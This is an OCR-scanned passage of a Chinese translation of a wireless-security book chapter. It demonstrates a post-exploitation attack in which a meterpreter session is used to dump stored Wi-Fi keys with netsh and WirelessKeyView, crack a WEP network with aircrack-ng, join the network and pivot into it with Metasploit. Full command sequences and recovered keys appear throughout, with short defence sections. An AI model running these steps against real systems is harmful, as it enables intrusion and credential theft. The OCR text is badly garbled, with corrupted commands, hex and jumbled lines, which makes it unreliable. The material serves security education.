
There 13 1 interface on 七 he system: 
Name : Wireless Network Connect1ion 
Description : Intel (RFR) Wireless WiF1 Link 49652aAGN 
GUID : Ede881 /1-1aali-4eft9-bcef-?2aabdcad2?421 
Physical Address DO0:21:90: je 10:c3 
State : disconnected 


netsh wlan show interfaces 命 令 的 输出 为 我 们 提供 了 受害 者 主机 的 附加 信息 ， 包 括 接口 的 GUIDIJ 和 额外 的 说 明 信 息 ， 该 
言 息 揭 示 了 本 地 接口 的 型 号 是 Intel Centrino 4965AGN 适 配器 。 如 果 接 口 正在 使 用 中 ， 那 么 该 命令 的 输出 将 显示 为 State: 
connected (状态 : 已 连接 ) ， 并 揭示 了 诸如 AP 的 SSID 和 BSSID 值 ， 无 线 信 号 的 类 型 (如 802.11a、b、g 或 者 n) ， 身 份 验证 和 
加 密 套件 信息 ， 以 及 相对 信号 强度 百分比 ， 接 收 和 发 送 的 数据 传输 速率 等 信息 。 


我 们 还 可 以 收集 额外 的 驱动 程序 特定 的 信息 ， 包 括 驱 动 程序 的 创建 日 期 和 容量 信息 


C:“"“>netsh wlan Show drivers 


Interface name: Wireless Network Connectlion 
Driver : Intel (R) Wireless WiF1 Link 4965AGN 
Vendor : Intel Corporation 
Provider Intel 
Date "3/4/2009 
Version = 
INF file : C:\Windows\INF‘\oemi8.1inf 
Files = 
C:\Windows\system32\DRIVERS\NETWwoOVv32.3y3 
-:\Windows\s3ystem32\NETwoc32.d1ll 
-:\Windows\system32\NETwor32.d1ll 
TYPe : Natjve Wi-F1 Driver 
Radio types supported :3802.11b 
FIPS 140-2 mode supported : Yes 


Authentication and cipher supported jin infrastructure mode: 


Open None 
WPA2—Enterprise TKIP 
WPA2—Enterprlise CCMP 
WPA2-Personal TKIF 
WPA2-Personal CCME 
Open Unknown 


在 netsh wlan show drivers 命 令 的 输出 中 ， 让 我 们 特别 感 兴趣 的 缩写 是 Type (类 型 ) 这 一 行 ， 该 行内 容 表明 该 驱动 程序 是 
一 个 Native Wi-Fi Driver (本 地 的 Wi-Fi 驱 动 程序 ) ， 这 意味 着 它 符 合 NDIS 6.0 规 范 ， 包 括 一 些 从 传统 的 Windows XP 驱动 程序 
中 继承 过 来 的 重要 功能 (也 可 使 用 Windows Vista 和 Windows 7 系统 ) 。 


现在 ， 我 们 知道 我 们 的 工作 在 本 地 的 Wi-Fi 驱 动 程序 上 ， 我 们 可 以 继续 枚 举 系统 ， 并 确定 在 本 地 系统 上 所 有 的 首选 网 络 


C:\>netsh wlan Show profiles 
Profiles on interface Wireless Network Connect1ion: 


Group Policy Profiles (read only) 


User Proftiles 


All User Profile : hhonors 
All User Proftile : Somethingclever 
All User Protile : bbhwlan 


在 netsh wlan show profiles 命 令 的 输出 中 ， 我 们 可 以 通过 组 策略 推送 设置 (此 信息 没有 出 现在 上 面 输出 中 ) 和 配置 文件 名 
(通常 和 网 络 的 SSID 相 同 ) 指定 的 用 户 配 置 文件 来 确定 所 有 的 配置 信息 。 


对 于 一 个 给 定 的 配置 文件 ， 我 们 现在 可 以 提取 XML 配置 中 的 设置 项 : 


C:\>netsh wlan export profile name="pbbhwlan" 
nterface Profile "bbhwlan™. is saved 1in file ".\Wireless Network Connection— 
bbhwljan.xmil™ suCCcessfully. 
C:\>type "Wireless Network Connection-bbhwlan.xml™" 
<3Xm] version="1.0"?»> 
<WLANPIrofile xmlns="http://www.microsoftt.com/networking/WLAN/profile/vi™"> 
<name>bbhwlan</name> 
<SSIDConf1ig> 
SSID.> 
<hex>626268776C616E</hex> 
<name>bbhwlan</name> 
</SSID> 
<nonBbroadcocast>true</nonBroadocast> 
</SSIDConNnfig> 
<connectionType>ESS</connectionType> 
<aonnectionMode>auto</connectionMode> 
<autoSwitaoh>true</autoSwitah> 
<MSM»> 
<SecCurity> 
<authEncryption> 
<authentication>WPA2</authentication> 
<encrvotion>AES</encrvyption» 
<uUSeEOneX>true</useOnex> 
</authEncrypBtion> 
<Onex xmilns="http://www.microsoft.com/networking/oOnex/v1i™"™> 
<EAPCoNnfig><EapHostConfig xmlns="http://www.microsoft.com 


:provisioning/EapHostConfig"><EapMethod><Type xmlns="http:/ /www .microsoft.com/ 


provisioning/EapCommon"™>25</Type><VendorId xmlns="http:/ wwWw-mLECEOSOEL -CoIm/ 


provisioning/EapCommon">0O</VendorId><VendorType xmlns="http://www .microsoft .com 
:provisioning/EapCommon">0</VendorType><AuthorId xmlns="http://www.microsoft. 
O56 


com/provisioning/EapCommon"™>0</AuthorId></EapMethod><ConfigBlob>010000005€ 
001000000601000000010000002D000000350000000100000014000000627F8D7827656399D27D7F 


90AACOFEB3F33EFASAO0O00001000000170000001A00000001000000020000000000000000000000 
</ConfigBlob></EapHostConfiqg></EAPConfig> 
</Onex> 
</security> 
</MSM> 

</WLANPIrof1le»> 

文件 的 大 部 分 内 容 是 不 言 自 明 的 ， 如 SSID 的 识别 、 加 密 算法 ， 以 及 在 配置 文件 中 使 用 了 的 认证 方法 。 不 过 ， 有 几 个 地 方 还 
是 需要 给 出 进一步 的 解释 : 

nonBroadcast 设置 为 tue 时 ， 表 明 此 配置 文件 被 配置 为 在 连接 到 网 络 的 时 候 ，SSID 隐 藏 或 掩盖 。 这 种 配置 易于 受到 使 


用 Karmetasploit 和 FreeRADIUS-WPE 等 进行 的 方法 AP 假 冒 攻击 (AP impersonation attacks) 。 


. ConnectionType 该 项 标识 把 一 个 配置 好 的 网 络 当 做 一 个 基础 设施 设备 (ESS) ， 如 一 个 AP， 或 一 个 ad-hoc 网 络 


(IBSS) 。 


“ConnectionMode 当 设 定 为 自动 模式 时 ， 此 项 表示 当 客 户 端 处 于 信号 覆盖 范围 内 时 ， 客 户 端 会 自动 连接 到 那个 此 前 已 


在 个 人 配置 文件 中 指定 的 SSID; 采用 manual 设 置 时 ， 此 要 素 表 示 客 户 端 仅 在 由 用 户 手 动 操作 时 才 会 连接 到 网 络 。 


-auto9Switch 设置 为 ttue 时 ， 当 配置 文件 中 有 一 个 功率 履 盖 范围 内 的 网 络 在 配置 文件 中 的 顺序 优先 级 更 高 时 ， 客 户 端 会 切 
换 到 这 个 更 部 的 网 络 上 。 


. EapMethod 该 项 内 容 标明 配置 的 EAP 类 型 。 常 见 的 EAP 类 型 包括 : 25 (PEAP) 、13 (EAP-TLS) 、43 (EAP-. 
FAST) 、6 (EAP-GTC) 和 17 (CiscoLEAP) 。 一 个 完整 的 EAP 号 码 分 配 列 表 可 在 http://www.iana.org/assignments/eap-numbers 上 


找到 。 


ConfigBlob 该 项 内 容 用 于 指定 EAP 指 定 类 型 属性 的 二 进 制 格式 配置 ， 包 括 内 部 认证 协议 、CA 信 任 选 择 和 服务 器 证 书 验 
证 属性 。 一 个 同伴 容器 config 可 以 用 于 指定 相同 的 参数 ， 只 是 后 者 使 用 的 是 人 易 读 的 XML 格式 ， 而 不 是 二 进 制 格式 的 blob 数 据 ， 
这 些 数据 的 属性 保存 在 本 地 。 


第 二 个 配置 文件 使 用 不 同 的 安全 机 制 ， 在 这 里 采用 的 是 缩写 的 形式 显示 : 


<2XMm] rsion="1 .0"?> 
ee 
<SeEcurlt: yy> 
<authEncryption> 
<AaAuthentication>WEAPSK<,) 
<encryption>TRKIP</encrypticon> 
<USsSeOneX>ialse</UuseOneX> 


‘authentication> 


< 
<Share gs 
<keyMaterial>01000000DO8C9DDF0115D1118C7AO00COAFC 
AE1BDI39EDEF 3B20E664A63F18000000BE 10438AE3386F 19AESD3Al1ELTFD8FBDICESAT30 IC5B218E7 
41A00000066B32DBUOA TDEA1D864AA3F ij4 1C21468FAD1261E</keyMaterlial> 
</sharedRKey> 
</Security> 


</WLANProflile> 


在 这 个 例子 中 ， 网 络 配 置 文件 使 用 了 通过 TKIP 作 为 加 密 协 议 的 WPA-PSK 验 证 。Windows 将 这 些 预 共 享 密 钥 (PSK) 和 成 对 


主 密 钥 (PMK) 用 一 种 加 密 的 格式 保存 企 KkeyMaterial 容 器 中 。 
这 个 命名 的 配置 文件 : 


有 了 这 个 配置 文件 ,我们 可 以 将 该 文件 复制 到 另 一 台 Vista 主 机 上 ， 然 后 在 另 一 台 主 机 上 导入 这 


cc:\attacker>netsh wlan add profile 


filename="Wireless Network Connect1ion- 


somethingclever.xml" 
Profile bbhwlan 13 added on interface Wireless Network Connectilion. 
即使 攻击 者 无 法 破解 sharedKey blob 的 内 容 ， 她 也 可 以 在 另 一 台 主 机 上 通过 简单 地 导入 该 提取 配置 文件 的 方法 获得 访问 网 


络 的 能 力 。 这 种 方法 限制 了 攻击 者 破解 捕捉 到 的 无 线 局 域 网 来 往 数 据 包 的 能 力 ， 从 而 使 从 Windows Vista 和 Windows 7 的 配置 


言 息 中 恢复 密 钥 成 为 


@ 在 WirelessKeyView 中 还 原 PSK 


WirelessKeyView 工 具 作 为 一 款 免 费 软件 ， 是 由 NirSoft 公 司 (http://www.nirsoft.net/utils/wireless key.html) 对 外 发 布 
的 。 对 于 运行 企 Windows XP、Windows Vista 和 Windows 7 操作 系统 中 的 WEP、WPA-PSK 和 WPA2-PSK 网 络 ， 该 软件 允许 
提取 并 显示 保存 的 无 线 网 络 加 密 密 钥 信息 。 双 击 从 网 上 下 载 的 唯一 可 执行 文件 将 启动 该 工具 ， 它 将 以 PMK 和 和 PSK 格式 (用 于 
WPA 和 WPA2 加 密 算法 ) 显示 加 密 的 密 钥 ， 如 下 图 所 示 。 


Ln Wirelesskeyiew El 区 下 | 

FE Edit Wiew Help 

Network Na,.. Key Type -key (Hex Key (AscIl) Adapter Name ] 
rte pe lt 657 36 0140376073121 rep 时 pe dr ENSOGSASN | 


py honda-private WpA2-psk 407574686f72317333 645573337273306e6c7900  @uthorlz3dUs3rs0nby InteltRy Wireless WiFi Link 4965AGN | 
Nsomethingclever WPA-PSKE 06016d690c79200d6of766965206e0967687400 farmmily movie night InteltR) Vireless WiFi Link 4965AGN 


TT ' 


3 keyts) NirSoft Freeware. httip:/wyww.nirsoft.net 


对 于 一 个 使 用 远程 meterpreter 访 问 主 机 的 攻击 者 来 襄 ， 在 控制 全 界面 ( 即 Windows 的 命令 行 提 示 符 状态 。 一 -一 译 者 注 ) 
上 不 带 任何 参数 地 运行 WirelessKeyView 命 令 将 会 显示 该 工具 的 GUI 版 本 ， 这 会 潜在 地 暴露 攻击 者 所 在 的 系统 。 幸 运 的 
是 ，WirelessKeyView 支 持 的 一 些 命令 行 参 数 可 以 将 复原 的 密 钥 数 据 保存 到 一 个 文件 中 。 首 先 ， 我们 从 NirSoft 网 站 下 载 
WirelessKeyView， 然 后 解压 缩 成 我 们 攻击 系统 可 执行 的 文件 : 


willhackforsushi $ wget -本 http://www.nirsoft.net/utils/wirelesskeyview.2Zip 
willhackforsushi S$ unzip wirelesskeyview.2ip WirelessKeyView.exe 
Archive: wireless 


S 
inflating: WirelessKeyView.exe 


提示 WirelessKeyView 最 近 增 加 了 对 Windows 7 的 支持 。 但 要 从 命令 行使 用 ， 你 必须 通过 在 命令 行 输入 /codeinject 1 参数 。 


接 下 来 ， 我 们 可 以 返回 到 meterpreter 会 话 ， 上 传 WirelessKeyView.exe 文 件 ， 然 后 在 受害 者 的 系统 上 执行 该 文件 : 


光合 天 于 万 

meterpreter > upload WirelessKeyView.exe C:"“"“TEMP 

[*] uploading : WirelessKeyView.exe 一 > C:\TEMP 

[*] uploaded : WirelessKeyView.exe -> C:\TEMP\WirelessKeyView.exe 

meterpreter > execute 一 再 -i cmd.exe 一 工 

Process 6284 created. 

Channel 4 created. 

Microsoft Windows [Version 6.0.60011] 

a i (C) 2006 Microsoft Corporation.s All rights reserved. 
:Ntemp\wirelesskeyview /stext wkv-recovery.txt 

NE Wkv—Iecovery.txt 


Network Name (S33ID): honda-private 


Key Type : WPA2—PSK 

Key (Hex) : A401014686f 1231 1a3306455073331213306e6ci1900 
Key (ASCII | -Ruthorlz3dUs3rs0nly 

Adapter Name : Intel (RFR)} Wireless WiF1i Link 4965AGN 
Adapter GUI : {6DE88]71-7AAT7T-A4EF9-BCEF-2AABDCA42427]} 


Network Name (S33ID)}: coatracks 


Key Type -WEP 

Key (Hex) : G46f6v 36e6f /A4601869737421 

Key (ASsc11) : doesnotexlistl! 

Adapter Name :Intel(R) Wireless WiF1i Link 4965AGN 
Adapter Guid : {6DE88]171-7AAI-—-A4EF9-BCEF-2AABDCA4242717} 


WPA2-PSK 密 钥 的 破解 显示 


对 使 用 WPA2-PSK 和 WPA-PSK 网 络 的 最 重要 的 威胁 之 一 是 米 自 于 维持 PSK 本身 的 保密 方面 的 挑战 。 许多 组 织 采 取 措 施 来 防止 
向 用 户 公开 PSK， 如 : 不 允许 直接 从 工作 站 访问 网 络 ， 或 者 不 能 通过 客户 端 管理 类 似 于 Active Directory Group Policy (活动 目录 组 
策略 ) 等 软件 。 


， 任 何 用 户 在 自己 的 工作 站 上 以 本 地 管理 员 身 份 访问 并 运行 软件 ， 也 能 恢复 PSK (在 Windows Vista 上 ) 和 PMK (在 
Windows XP 上 ) 。 无 论 用 户 是 用 PSK， 还 是 用 PMK， 二 者 都 可 以 用 来 获取 目标 网 络 ， 并 且 二 者 都 可 以 用 来 解密 所 监听 的 网 络 来 
往 数 据 包 。 此 外 ， 一 旦 用 户 获得 PSK 或 PMK 的 知识 ， 他 可 以 与 任何 其 他 用 户 分 享 这 个 知识 ， 包 括 在 线 发 布 。 


即使 是 谈 入 式 设备 也 很 容易 将 PSK 或 PMK 信 息 暴 露 。 最 终 ， 加 入 到 WPA2-PSK 或 WPA-PSK 网 络 的 所 有 设备 都 需要 至 少 保存 
PMK 信 息 ， 该 信息 可 以 从 设备 运行 的 内 存 或 配置 文件 中 提取 出 来 。 


@ 防 币 WirelessKeyView 攻 击 


为 了 用 WirelessKeyView 恢 复 密 铀 ， 用 户 需要 他 们 的 本 地 工作 站 上 的 管理 员 权 限 。 如 果 可 能 的 话 ， 在 工作 站 上 限制 管理 员 的 
访问 权限 可 以 防止 该 用 户 获取 这 些 信息 。 


一 个 更 好 的 防御 机 制 是 从 根本 上 避免 使 用 WPA2-PSsK 和 WPA-PSsK 了 网络， 相反 使 用 EAP 方 法 (例如 EAP/TLS 或 PEAP) 进行 身 
份 验证 。 昌 然 所 需 的 基础 设施 会 更 贵 ， 但 使 用 EAP 的 企业 身份 验证 万 法 将 给 整个 网 络 提供 一 个 更 高 层面 的 网 络 安全 ， 避 免 使 用 静 
人 态 PSK 或 PMK 进 行 网 络 认证 和 密 钥 的 派生 。 


获得 了 本 地 客 尸 端的 信息 之 后 ， 我 们 可 以 继续 攻击 在 我 们 的 受害 者 系统 学 围 内 的 本 地 网 络 。 


[1] GUID， 即 Globally Unique Identifier (全 球 唯 一 标识 符 ) ， 又 称 为 UUID (Universally Unique Identifiet) 。GUID 是 一 个 通过 特定 
算法 产生 的 长 度 为 128 位 的 二 进 制 数字 标识 符 ， 用 于 唯一 地 标识 某 一 个 产品 。 译 者 注 


7.4 远程 无 线 侦 察 


在 连接 到 被 占领 主机 之 后 ， 我 们 现在 可 以 通过 使 用 主动 扫描 来 列举 和 发 现 范围 内 的 网 络 。Windows Vista 和 Windows 7 系 
统 都 包括 了 对 命令 行 通过 内 置 的 netsh 命 令 发 现 可 用 网 络 的 支持 : 


C: “>netsh wlan Show networks mode=bssid 
Interface Name : Wireless Network Conn 


on 
There are 2 networks currently visible. 


SSID J] amling 
Network type : Inftrastructure 
Authentication : Open 
Encryption : WEP 
BSSID 1 D0: 1a: 10:fc:c0:6+ 
Signal : 宇 昌吉 
Radio Type B802.11g 
Channel 中 
Basic Rates (Mbps) Ls: Be sand Cll 
Other Rates (Mbps) 6 le 24 36 
SSID 2 : Corp 
Network type : Infrastructure 
Authentication : WPA2 
Encryption : CCMP 


BSSID 1 :UO0:]I:I3:01]:e3:43 


Signal 18 和 名 

Radio Type BO02.11n 

Channel 1 

Basic Rates (Mbps) 上 “星河 5 汪 生 

Other Rates (Mbps) 6 9 12 18 24 36 48 54 


在 这 个 输出 中 ,我们 可 以 确定 发 现 了 多 个 网 络 ， 其 中 包括 一 个 带 SSID 的 WPA2 网 络 (PSK 指 标的 缺乏 说 明 该 网 络 采用 EAP 验 
证 ) ， 和 一 个 带 WEP 作 为 加 密 算法 的 开放 式 身份 验证 的 第 二 个 网 络 ， 


有 了 两 个 可 用 目标 的 网 络 ， 较 容易 的 攻击 选择 是 将 WEP 作 为 目标 。 因 为 市 有 一 个 gaming 的 SSID， 所 以 该 网 络 可 能 是 一 个 比 
较 吸 引 人 的 有 趣 目 标 ， 如 一 个 赌场 游戏 的 楼 层 。 我 们 将 通过 选 定 这 一 网 络 来 继续 我 们 的 分 析 。 


7.5 ”对 无 线 目标 网 络 进 行 攻击 


nmcap 进 程 创建 的 这 个 数据 包 捕 获 文件 保 仔 了 大 量 数据 ， 这 些 数据 足以 用 于 恢复 这 个 gaming 网 络 的 WEP 密 铀 。 不 笠 的 
是 ，Microsoft NetMon 系 统 在 保存 这 些 数据 包 捕 获 文件 的 时 候 ， 是 以 目 己 定义 的 格式 保存 的 ， 不 是 以 libpcap 格 式 进 行 保存 。 
而 后 者 格式 是 像 Aircrack-ng、Wireshark 这 样 的 工具 所 需要 的 格式 ， 二 者 也 不 能 兼容 地 读 取 NetMon 所 捕获 的 无 线 数 据 包 的 原 
始 文件 格式 。 和 幸运 的 是 ， 我 们 可 以 使 用 nm2lp 工 具 将 数据 转换 成 一 个 libpcap 格 陈 的 文件 。 


会 ”Nm2Ip 转 换 博 获 到 的 数据 包 


A | 


nm2lp 工 具 是 将 Microsoft NetMon 所 捕获 到 的 无 线 数 据 包 专 有 格式 转换 为 libpcap 格 式 ， 该 格式 可 用 来 做 通用 的 libpcap 分 
析 ， 并 且 可 以 被 Aircrack-ng、Ettercap 和 Wireshark 等 软件 使 用 来 作为 攻击 工具 。Nmz2lp 运 行 在 Windows 主 机 上 ， 并 且 要 求 
NetMon 和 libpcap 都 已 安装 好 。 


一 旦 我 们 下 载 了 gaming.cap 数 据 包 捕获 文件 ， 我 们 束 需 要 将 它 传送 到 Windows 主 机 上 。 下 载 nm2lp 工 具 的 网 络 地 址 是 : 
http://www.inguardians.com/tools/VistaWirelessPowerTools/nm21lp-1.0.zip， 下 载 结束 后 将 该 程序 解压 缩 到 方便 的 位 置 


然后 像 下 面 所 示 的 那样 运行 该 工具 : 


警告 nm2lp 当 前 的 发 布 版 本 可 以 运行 在 64 位 的 Windows 7 上 的 提示 符 中 。 和 希望 ， 这 将 在 未 来 可 以 得 到 解决 。 


品 


CcC:\attack>nm?1p 
nm21lp: Convert NetMon 3.2 capture to libpcap format (version 1 .0). 


Copyright (CC 2008 Joshua Wright <Jwright@willhackforsushi .com> 
Usage: nm21p <Input NetMon Capture> <Output Libpcap Capture> 
CcC:\attack>nm?2]p gaming.cap gaming.pcap 


注意 ”由 于 libpcap 必 须 安装 以 后 才能 使 用 ， 因 此 在 受害 者 主机 上 运行 hIm2lp 通 常 是 不 切实 际 的 。 这 意味 着 攻击 者 必须 有 多 
主机 在 他 的 控制 之 下 ， 然 后 利用 多 个 系统 的 数据 转换 成 合适 的 格式 以 便于 他 的 攻击 。 


我 们 将 文件 复制 到 我 们 的 攻击 服务 器 上 ， 利 用 我 们 的 用 于 攻击 的 Linux 工 具 。 使 用 libpcap 格 式 的 数据 包 捕获 文件 ， 我 们 就 可 
以 使 用 Aircrack-ng 处 理 数据 来 恢复 WEP 密 钥 : 
Willhackforsushi $$ aircrack-—ng 一 Gb O00:1A:710:FC:CO:6EF gaming.pcap 


KEY FOUND! [ 62:40:60:6C5197061:61 :6D:31:6E:67:31:30 |] {ASCII: BEllygamlngl0 ) 


sn 
UU 山寺 


Decrypted correctly: 


知道 了 WEP 密 钥 ， 我 们 束 可 以 配置 无 线 接口 连接 到 那个 gaming 网 络 。 返 回 到 攻击 者 的 Windows Vista 客 户 端 ， 我 们 通过 单 
击 Control Panel (控制 面板 ) |Manage Wireless Network ( 宫 理 无 线 网 络 ) 按钮 ， 然 后 单 击 + 按 钮 添加 一 个 无 线 配 置 文 件 。 
我 们 选择 Manually Create A Network Profile (手动 创建 一 个 网 络 配置 文件 ) 按钮 ， 并 输入 SSID， 加 密 该 设置 项 ， 并 从 
Aircrack-ng 上 显示 密码 短语 信息 。 单 击 Next (下 一 步 ) 按钮 ， 然 后 单 击 Close (关闭 ) 按钮 完成 配置 。 


一 旦 配置 文件 被 添加 到 攻击 者 的 工作 站 中 ， 我 们 惑 可 以 将 它 导 出 为 一 个 XML 配置 文件 ， 并 将 它 传送 到 受害 者 的 系统 中 。 在 
攻击 者 的 系统 中 ， 我 们 为 新 的 网 络 导出 该 配置 文件 : 


Cc:\attack>netsh wlan export profile ame= "gaming" 

Interface profile "gaming" is saved in file ".\Wireless Network Connection— 
Gaming .xml™” successtftull 

N1 ra Network Connection-gaming.xml” gaming.xml 


Cattacksrename "WW 


一 旦 XML 文 件 创建 成 功 ， 我 们 就 把 它 复 制 到 攻击 者 的 服务 器 上 。 接 下 来 ， 我 们 回 到 meterpreter 的 shell 程 序 上 并 上 传 
gaming.xml 文 件 到 受害 者 主机 上 : 


meterpreter > upload gaming.xml C:\‘\TEMP 
[*] uploading : gaming.xml 一 > CTEMP 
[*] uploaded : Jaming.xml -> C:‘\TEMP\gaming .xml 


现在 ， 我 们 运行 一 个 cmd.exe 的 shell 程 序 ， 并 且 在 受害 者 主机 上 执行 导入 XML 配置 文件 的 netsh 命 令 


meterpreter > execute -H -i cmd.exe 一 工 

Process 606188 created 

channel 10 created 

Microscft Windows [Version 6.0.6001] 

Copyright (Cj 2006 Microsoft Corporation. All rights 


CDC: >netsh wlan 


Profile aa 


dl 


mindg 1I3 added on interftace Wireless 


因为 我 们 创建 配置 文件 时 ， 选 
开 监控 模式 之 后 需要 一 个 复位 操作 ， 我 们 可 以 在 命令 行 完 成 该 操作 ， 如 下 所 示 : 


已 :>DetsSh interface set interface "Wireless Network 
C: ">netsh interface set interface "Wireless Network 


C:\>netsh 
Connection request 13 
AND 了 可 

Windows IP Configuration 


Wireless LAN adapter Wireless Network Connection 


Connection-specific DNS Suffix 

Link—local IPFve Address fe80: :9914:a0cIf 

TPVvd Address. 10.10.10.19 
Subnet Mask a es BO a es BR 


Default Gate 10 .00 
使 用 这 个 到 gamingpw 


设备 。 在 攻击 者 的 服务 器 上 ， 我 们 安 闪 这 些 功 能 所 需要 的 Metasploit 依 赖 程序 : 


Connection”™ 


Connection™ 


reserved. 


add profile i 
NE 已 七 1 WC 


Connect1ion 


择 的 选项 是 不 自动 连接 ， 所 以 我 们 现在 必须 手动 连接 到 gaming 了 网络 。 许 多 无 线 网 卡 适 配器 在 


名 新 的 连接 ， 我 们 就 可 以 利用 Metasploit 的 db_nmap 和 和 db_autopwn 功 能 发 现 和 攻击 网 络 上 的 任何 


$ sudo apt-get install libsqlite3-ruby sqlite3 
接 下 来 ， 我 们 返回 到 meterpreter 提 示 符 状态 ， 然 后 按 Ctrl+Z 键 回 到 会 话 的 后 台 。 然 后 ， 我 们 创建 了 一 个 新 的 数据 库 用 于 仓 


储 扫 摘 的 结果 ， 分 析 漏 洞 扫 摘 结果 的 记录 内 容 ， 如 下 所 示 : 


meterpreter > 
= 


Background session 1? [y/N] 

msi exploit (handler) > db create 

[*] Creating a new database lnstance... 

[*] Successfully connected to the database 
[*] File: /home/ jwright/ .msf3/sglite3.db 
msft exploit (handler) > 


下 一 步 ， 我 们 将 通过 受害 者 系统 为 Metasploit 添 加 一 个 作为 枢纽 的 路 由 : 


msSd exploit (handler) > route 


注意 在 这 个 路 由 名 命令 中 ， 当 我 们 将 meterpreter 的 shell 程 序 设 为 后 合 


运行 时 ， 


add 10.10.10.0 252.2 


尾部 的 参数 1 对 应 着 所 显示 的 会 话 标识 。 


随 寿 路 由 和 db _driver 模 块 的 加 载 ， 我 们 残 可 以 运行 db_nmap 工 具 来 识别 主机 : 


msf exploit (handler}) > db nmap -3T -FF -nn 10.10.10.1—20 

[*] Execor "Dar/binynmap™ "=aT™ TE Mon™ TMI.10.10.1=20™ "ox" 
"tmp/donmap20090923-6087-cttuw-0" 

NMAP: 

NMAP: Starting Nmap 4.76 ( http://nmap.org ) at 2009-09-23 15:39 EDT 

NMAP: Interesting ports on 10.10.10.3 

NMAP: Not shown: 4 closed ports 


NMAP: PORT STATE SERVICE 
NMAP: 25/tcp filtered smtp 

NMAP: 80/tcp open http 

NMAP: 1]35/tcp filtered msrpc 

NMAP: ll]39/tcp filtered netbiocos-ssn 
NMAP: 445/tcp filtered microsoft-ds 


NMAP: 11720/tcp filtered H.323/Q.931 


从 这 里 开始 ， 我 们 可 以 继续 攻击 内 部 网 络 的 主机 ， 尽 可 能 地 利用 Metasploit 的 db_autopwn 模 块 来 解析 nmap 扫 描 结 果 ， 并 
传送 那些 可 用 于 匹配 目标 操作 系统 和 端口 的 信息 。 


注意 ” 当 使 用 meterpretet 通 过 远程 Windows 主 机 路 由 TCP 通 信和 数据 包 时 ， 我 们 受 限于 Windows TCP 协 议 堆 栈 的 能 力 。 由 于 这 个 
原因 ， 我 们 选择 TCP 连 接 扫 描 的 类 型 参数 为 ， 因 为 该 参数 是 Windows 主 机 所 支持 的 。 


提示 关于 db_ autopwn 模 块 的 更 多 信息 ， 请 参阅 http://www.offensive-secutity.com/metasploit-unleashed 上 的 Offensive 


Securityl | 的 “Metasploit Unleashed ” 。 


@ 深度 无 线 防御 


在 本 章 中 ， 我 们 通过 一 次 针对 我 们 虚构 的 Potage Foods 无 线 环境 的 攻击 ， 占 领 客户 新 系统 ， 然 后 使 用 它 进 行 网 络 访问 并 破 
解 更 多 的 内 部 系统 。 针 对 这 种 风格 攻击 的 应 对 措施 ， 也 同 许多 我 们 已 经 员 穿 全 书 描述 的 防御 机 制 一 样 ， 对 这 些 防御 机 制 的 深入 应 
用 ， 可 以 阻止 来 自 无 线 客户 端的 攻击 者 的 进一步 攻击 ， 从 而 避免 危及 企业 内 部 网 络 的 威胁 ， 避 免 了 网 络 被 扫描 和 内 部 主机 被 对 方 
枚 举 : 


. 禁止 开放 的 网 络 ”允许 外 界 用 户 访 问 开放 的 网 络 (例如 热点 环境 ) 是 给 攻击 者 的 请 束 。 攻 击 者 可 以 利用 软件 升级 机 制 (使 
用 本 章 中 所 描述 的 技术 ) ， 或 者 其 他 存在 弱点 但 非常 主流 协议 (如 DNS 协议 ) 进行 攻击 。 通 过 在 用 户 工作 站 上 的 管理 控制 可 以 中 
止 开放 的 网 络 ， 继 而 限制 客户 端 暴 露 给 攻击 者 。 


: 上 层 加 密 ”如 果 用 户 必 须 访问 开放 的 网 络 ， 则 可 以 考虑 要 求 上 层 加 密 的 服务 来 强制 安全 政策 ， 例 如 ， 如 IPSec VPN 技 术 ， 
些 技术 可 以 在 网 络 上 防止 攻击 者 的 窃听 或 者 操纵 客户 端的 活动 。 


- 蔷 止 未 经 过 滤 的 输出 沉 量 ”在 本 章 中 ， 为 了 能 够 在 破解 客户 端 系统 后 ， 攻 击 者 能 够 对 内 部 网 络 进行 访问 ， 可 以 使 用 一 种 远 
程 访 问 机 制 ， 该 机 制 利 用 Metasploit 的 Metetptetet， 过 一 会 儿 Metasploit VNC 模 块 从 被 破坏 的 客户 端 传送 到 攻击 者 的 系统 。 从 整个 
网 络 禁 止 未 经 过 滤 的 输出 流量 是 指 通 过 防火 墙 和 强制 代理 服务 器 系统 的 使 用 ， 可 以 缓解 随后 网 络 访问 机 制 所 带 来 的 风险 ， 限 制 攻 
击 者 访问 内 部 网 络 。 


[1] 进攻 安全 ， 一 个 专门 提供 网 络 进攻 培训 的 黑客 组 织 。 译 者 注 


7.6 ”本章 小 结 


在 本 章 中 ， 我 们 看 到 一 个 端 到 山 的 攻击 ， 该 攻击 在 客户 妆 的 软件 升级 过 程 中 ， 采 上 一 个 在 Java Runtime Engine (Java 运 行 
时 引擎 ) 方面 的 漏洞 ， 利 用 该 漏洞 加 载 一 个 编码 的 Metasploit 的 meterpreter 有 效 载 傈 。 一 旦 受害 者 试图 安装 该 欺骗 Java 的 升级 
程序 ，meterpreter 有 效 载 人 就 会 执行 ， 并 授予 我 们 的 攻击 者 远程 访问 受害 者 的 系统 。 


在 远程 访问 受害 者 系统 的 时 候 ， 我 们 可 以 攻击 那些 由 于 物理 距离 的 限制 ， 和 而 不 是 及 用 无 线 访问 的 无 线 网 络 。 使 用 内 置 的 工具 
和 其 他 Microsoft 公 司 软件 ， 我 们 能 够 将 Windows Vista 的 受害 者 主机 作为 一 个 不 愿 参与 者 加 入 到 对 WEP 网 络 的 攻击 行列 ， 在 列 
举 附 近 首 选 的 无 线 网 络 配 置 以 后 ， 束 可 以 使 用 Microsoft NetMon 完 成 远 并 数 据 包 的 收集 。 然 后 使 用 Metasploit 的 功能 作为 
VNC 反 向 TCP 有 效 载 位 使 用 ， 我 们 束 能 够 获得 必要 的 图 形 用 尸 界 面 的 访问 ， 通 过 该 界面 可 以 在 监控 模式 下 控制 无 线 适配器 的 信 
道 , 使 用 NetMon 的 nmcap 包 捕获 工具 将 收集 到 的 数据 保存 到 一 个 文件 中 。 


一 旦 收集 到 足以 恢复 WEP 密 钥 数 量 的 数据 以 后 ，nm2lp 程 序 束 可 以 将 我 们 的 数据 格式 从 NetMon 格 式 转 换 成 libpcap 格 式 ， 
这 样 我 们 束 可 以 米 用 包括 Aircrack-ng 在 内 的 通用 攻击 工具 。 一 旦 我 们 恢复 了 密 钥 值 ， 我 们 束 返 回 到 受害 者 系统 的 命令 行 ， 添 加 
了 一 个 目标 网 络 作为 一 个 新 的 连接 配置 文件 内 容 ， 然 后 连接 到 这 个 受害 者 的 网 络 上 ， 从 攻击 者 主机 通过 受害 者 之 间 进 行路 由 ,最 
